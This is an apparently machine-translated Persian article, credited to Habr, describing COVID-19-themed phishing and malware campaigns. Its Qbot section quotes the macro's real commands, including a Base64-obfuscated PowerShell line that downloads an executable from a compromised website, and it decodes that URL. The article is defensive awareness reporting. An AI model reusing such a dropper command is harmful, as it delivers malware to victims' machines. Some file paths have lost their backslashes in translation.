حملات سایبری ویروس کرونا: تمام موضوع در مهندسی اجتماعی است

مهاجمان همچنان از موضوع COVID-19 سوء استفاده می کنند و تهدیدات بیشتری را برای کاربرانی ایجاد می کنند که شدیداً به همه چیز مربوط به این بیماری همه گیر علاقه دارند. که در آخرین پست قبلاً در مورد انواع بدافزارها در پی شیوع ویروس کرونا صحبت کرده ایم و امروز در مورد تکنیک های مهندسی اجتماعی صحبت خواهیم کرد که کاربران در کشورهای مختلف از جمله روسیه قبلاً با آن مواجه شده اند. روندها و نمونه های کلی در حال کاهش هستند.

به خاطر بسپارید آخرین بار ما در مورد این واقعیت صحبت کردیم که مردم مایلند نه تنها در مورد ویروس کرونا و روند همه گیری، بلکه در مورد اقدامات حمایتی مالی نیز مطالعه کنند؟ در اینجا یک مثال خوب است. یک حمله فیشینگ جالب در ایالت نوردراین-وستفالن آلمان یا NRW کشف شد. مهاجمان کپی هایی از سایت وزارت اقتصاد ایجاد کردند (وزارت امور اقتصادی NRW، جایی که هر کسی می تواند برای کمک مالی درخواست دهد. چنین برنامه ای در واقع وجود دارد و معلوم شد که برای کلاهبرداران مفید است. آنها با دریافت اطلاعات شخصی قربانیان خود، درخواستی را در وب سایت وزارتخانه واقعی انجام دادند، اما سایر جزئیات بانکی را ذکر کردند. بر اساس اطلاعات رسمی، تا زمان کشف این طرح، 4 هزار درخواست جعلی از این دست انجام شد. در نتیجه 109 میلیون دلار در نظر گرفته شده برای شهروندان آسیب دیده به دست کلاهبرداران افتاد.

آیا می خواهید یک آزمایش رایگان برای COVID-19 انجام دهید؟

یکی دیگر از نمونه های قابل توجه فیشینگ با موضوع کروناویروس بود کشف شده در ایمیل ها این پیام ها با پیشنهاد انجام آزمایش رایگان برای ابتلا به ویروس کرونا توجه کاربران را به خود جلب کرد. در پیوست این نامه ها نمونه هایی از Trickbot/Qakbot/Qbot وجود داشت. و هنگامی که کسانی که مایل به بررسی سلامت خود بودند شروع به "پر کردن فرم پیوست" کردند، یک اسکریپت مخرب در رایانه بارگیری شد. و برای جلوگیری از آزمایش sandboxing، اسکریپت تنها پس از مدتی، زمانی که سیستم‌های حفاظتی متقاعد شدند که هیچ فعالیت مخربی رخ نخواهد داد، شروع به دانلود ویروس اصلی کرد.

متقاعد کردن بیشتر کاربران برای فعال کردن ماکروها نیز آسان بود. برای انجام این کار، از یک ترفند استاندارد استفاده شد: برای پر کردن پرسشنامه، ابتدا باید ماکروها را فعال کنید، به این معنی که باید یک اسکریپت VBA را اجرا کنید.

همانطور که می بینید، اسکریپت VBA به طور خاص از آنتی ویروس ها پوشانده شده است.

ویندوز دارای یک ویژگی انتظار است که در آن برنامه قبل از پذیرش پاسخ «بله» پیش‌فرض، /T <seconds> منتظر می‌ماند. در مورد ما، اسکریپت قبل از حذف فایل های موقت 65 ثانیه منتظر ماند:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

و در حین انتظار، بدافزار دانلود شد. یک اسکریپت مخصوص PowerShell برای این کار راه اندازی شد:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

پس از رمزگشایی مقدار Base64، اسکریپت PowerShell درب پشتی واقع در وب سرور قبلی هک شده از آلمان را دانلود می کند:

http://automatischer-staubsauger.com/feature/777777.png

و آن را با نام ذخیره می کند:

C:UsersPublictmpdirfile1.exe

پوشه ‘C:UsersPublictmpdir’ هنگام اجرای فایل "tmps1.bat" که حاوی دستور است حذف می شود cmd /c mkdir ""C:UsersPublictmpdir"".

حمله هدفمند به سازمان های دولتی

علاوه بر این، تحلیلگران FireEye اخیراً یک حمله هدفمند APT32 را با هدف ساختارهای دولتی در ووهان و همچنین وزارت مدیریت اضطراری چین گزارش کردند. یکی از RTF های توزیع شده حاوی پیوندی به مقاله نیویورک تایمز با عنوان بود به‌روزرسانی‌های زنده کرونا: چین مسافرانی از هوبئی را ردیابی می‌کند. با این حال، پس از خواندن آن، بدافزار دانلود شد (تحلیلگران FireEye نمونه را به عنوان METALJACK شناسایی کردند).

جالب اینجاست که طبق گفته Virustotal، در زمان شناسایی، هیچ یک از آنتی ویروس ها این نمونه را شناسایی نکردند.

زمانی که وب سایت های رسمی از کار افتاده اند

بارزترین نمونه حمله فیشینگ همین روز پیش در روسیه اتفاق افتاد. دلیل این امر انتصاب مزایای مدتها مورد انتظار برای کودکان 3 تا 16 ساله بود. هنگامی که شروع پذیرش برنامه ها در 12 می 2020 اعلام شد، میلیون ها نفر برای کمک مورد انتظار به وب سایت خدمات دولتی هجوم بردند و پورتال را بدتر از یک حمله DDoS حرفه ای خراب کردند. وقتی رئیس جمهور گفت که «خدمات دولتی نمی توانند با جریان درخواست ها کنار بیایند»، مردم شروع به صحبت آنلاین درباره راه اندازی یک سایت جایگزین برای پذیرش درخواست ها کردند.

مشکل این است که چندین سایت به طور همزمان شروع به کار کردند، و در حالی که یکی، سایت واقعی در posobie16.gosuslugi.ru، در واقع برنامه ها را می پذیرد، بیشتر ده ها نفر داده های شخصی کاربران ساده لوح را جمع آوری می کنند.

همکاران SearchInform حدود 30 دامنه جدید جعلی را در منطقه .ru پیدا کردند. شرکت Infosecurity و Softline بیش از 70 وب سایت خدمات دولتی جعلی مشابه را از ابتدای آوریل ردیابی کرده اند. سازندگان آنها نمادهای آشنا را دستکاری می کنند و همچنین از ترکیب کلمات gosuslugi، gosuslugi-16، vyplaty، covid-vyplaty، posobie و غیره استفاده می کنند.

هایپ و مهندسی اجتماعی

همه این مثال‌ها تنها تأیید می‌کنند که مهاجمان با موفقیت از موضوع کرونا درآمد کسب می‌کنند. و هر چه تنش اجتماعی بیشتر باشد و مسائل نامشخص تر باشد، کلاهبرداران شانس بیشتری برای سرقت داده های مهم دارند، افراد را مجبور می کنند تا خودشان پول خود را رها کنند یا به سادگی رایانه های بیشتری را هک کنند.

و با توجه به اینکه همه‌گیری افراد بالقوه ناآماده را مجبور کرده است که به طور انبوه از خانه کار کنند، نه تنها داده‌های شخصی، بلکه اطلاعات شرکتی نیز در خطر است. به عنوان مثال، اخیراً کاربران مایکروسافت 365 (آفیس 365 سابق) نیز در معرض حمله فیشینگ قرار گرفتند. مردم پیام‌های صوتی عظیم «از دست رفته» را به عنوان ضمیمه نامه دریافت کردند. با این حال، فایل ها در واقع یک صفحه HTML بودند که قربانیان حمله را به آن می فرستاد صفحه ورود جعلی Microsoft 365. در نتیجه، از دست دادن دسترسی و به خطر افتادن تمام داده های حساب.

منبع: www.habr.com